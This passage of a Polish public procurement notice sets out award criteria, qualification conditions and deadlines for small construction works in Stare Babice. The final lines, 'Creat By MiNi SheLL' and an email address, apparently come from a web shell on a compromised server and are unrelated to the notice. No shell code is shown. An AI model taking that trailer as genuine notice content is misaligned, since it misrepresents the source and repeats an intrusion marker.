otoczaków,<br/>b)	pod stanowisko należy wykonać podlewkę z chudego betonu grubości 10 cm,<br/>c)	dla ukształtowania stanowiska należy wykonać obręcz z bednarki stalowej, ocynkowanej,<br/>d)	wnętrze obręczy należy wypełnić betonem. Beton powinien być zlicowany z górną krawędzią obręczy (dla prawidłowego odprowadzania wody),<br/>e)	w beton należy włożyć kamienie – otoczaki tak aby ich górne płaszczyzny wystawały,<br/>f)	obsługa geodezyjna i uporządkowanie terenu i przywrócenie do stanu pierwotnego,<br/>g)	przekazanie Zamawiającemu kompletnej dokumentacji powykonawczej zawierającej co najmniej:<br/>	inwentaryzację geodezyjną powykonawczą (Zamawiający dopuszcza, aby w dniu odbioru Wykonawca przedstawił potwierdzenie złożenia zamówienia pliku KCD do modyfikacji wraz z kopią operatu geodezyjnego)<br/>	atesty, certyfikaty i dopuszczenia do stosowania w budownictwie dla materiałów użytych do wykonania przedmiotu umowy.<br/>Zamawiający zastrzega, iż część zamówienia określona jako „prawo opcji” jest jednostronnym uprawnieniem, a nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, skorzystać z niego w mniejszym zakresie aniżeli określony powyżej, w szczególności w przypadku nie posiadania środków finansowych na ten cel a Wykonawcy nie przysługują z tego tytułu żadne roszczenia w stosunku do Zamawiającego, co akceptuje poprzez podpisanie niniejszej umowy.<br/>Zamówienie opcjonalne zostanie udzielone łącznie z zamówieniem gwarantowanym.<br/>W celu skorzystania z prawa opcji Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej.<br/>W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji, na warunkach określonych w niniejszym postępowaniu. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużona rękojmia za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał dostawę i montaż 2 wiat o wartości min. 10 000 zł brutto każda (realizowane na podstawie dwóch odrębnych umów). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z Rozdziałem IV SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z Rozdziałem IV SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z Rozdziałem IV SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 2 - projektowanymi postanowieniami umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/stare_babice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-20 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-18</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszystkie informacje dotyczące niniejszego postępowania w szczególności: opis<br/>przedmiotu zamówienia i warunki jego wykonania, podstawy wykluczenia i warunki udziału w<br/>postępowaniu,rodzaje oświadczeń i dokumentów jakie Wykonawca musi złożyć, kryteria oceny<br/>ofert dostępne, informacje dotyczące RODO są w SWZ i ogłoszeniu o zamówieniu dostępnych<br/>na stronie internetowej Zamawiającego https://platformazakupowa.pl/pn/stare_babice.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-05 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com